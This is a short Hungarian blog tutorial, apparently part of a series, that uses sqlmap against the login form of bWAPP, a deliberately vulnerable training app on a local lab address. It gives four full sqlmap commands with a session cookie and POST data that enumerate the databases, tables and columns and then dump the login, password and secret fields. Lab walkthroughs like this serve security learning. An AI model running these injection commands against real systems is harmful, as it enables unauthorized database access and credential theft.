A mai hack igen rövid lesz, de annál hasznosabb.
Egy login formon keresztül hajtjuk végre az előző posztban is leírt műveleteket, ami természetesen POST-ként küldi az adatokat.

Az oldal amit használunk:
http://192.168.100.5/bWAPP/sqli_3.php

Egy sima egyszerű login form, POST methoddal.

Mivel ezt az oldalt úgy érjük el ha bejelentkezünk a bWAPP-ba ezért az sqlmap-nak szüksége van a PHPSESSID-ra, illetve hogy a POST methoddal mit, hogyan küldünk. Én ez utóbbit BurpSuite-tal szedtem ki. Ha ezeket nem adjuk meg, sajnos hibát kapunk. Nem kell tőle félni, ha megmutatom egyből barátságosabb lesz.

Az előző cikket elolvasva elméletileg itt mindent kell érteni. Ugyanazt csináljuk, csak használunk két kapcsolót --cookie, --data.

Lássuk is a parancsot hogy ilyenkor hogyan néz ki:
sqlmap -u "http://192.168.100.5/bWAPP/sqli_3.php" --cookie="PHPSESSID=4027pqmtkf28u3f3dkc7lau415; security_level=0" --data="login=proba&password=proba&form=submit" --dbs
ezzel meg is szerezzük az adatbázisok neveit. Következő:

sqlmap -u "http://192.168.100.5/bWAPP/sqli_3.php" --cookie="PHPSESSID=4027pqmtkf28u3f3dkc7lau415; security_level=0" --data="login=proba&password=proba&form=submit" -D bwapp --tables
kiszedtük a táblák neveit a bwapp-ból. Jöhet a következő:

sqlmap -u "http://192.168.100.5/bWAPP/sqli_3.php" --cookie="PHPSESSID=4027pqmtkf28u3f3dkc7lau415; security_level=0" --data="login=proba&password=proba&form=submit" -D bwapp -T heroes --columns
megszereztük a heroes tábla oszlopait. Jöhet az utolsó lépés:

sqlmap -u "http://192.168.100.5/bWAPP/sqli_3.php" --cookie="PHPSESSID=4027pqmtkf28u3f3dkc7lau415; security_level=0" --data="login=proba&password=proba&form=submit" -D bwapp -T heroes -C login,password,secret --dump

ÉÉÉÉS ott vannak! :) Az sqlmap egy nagyon jó eszköz, és próbálok mélyebben elmélyedni a lehetőségeiben, amiket meg is osztok veletek!!

ch3llenger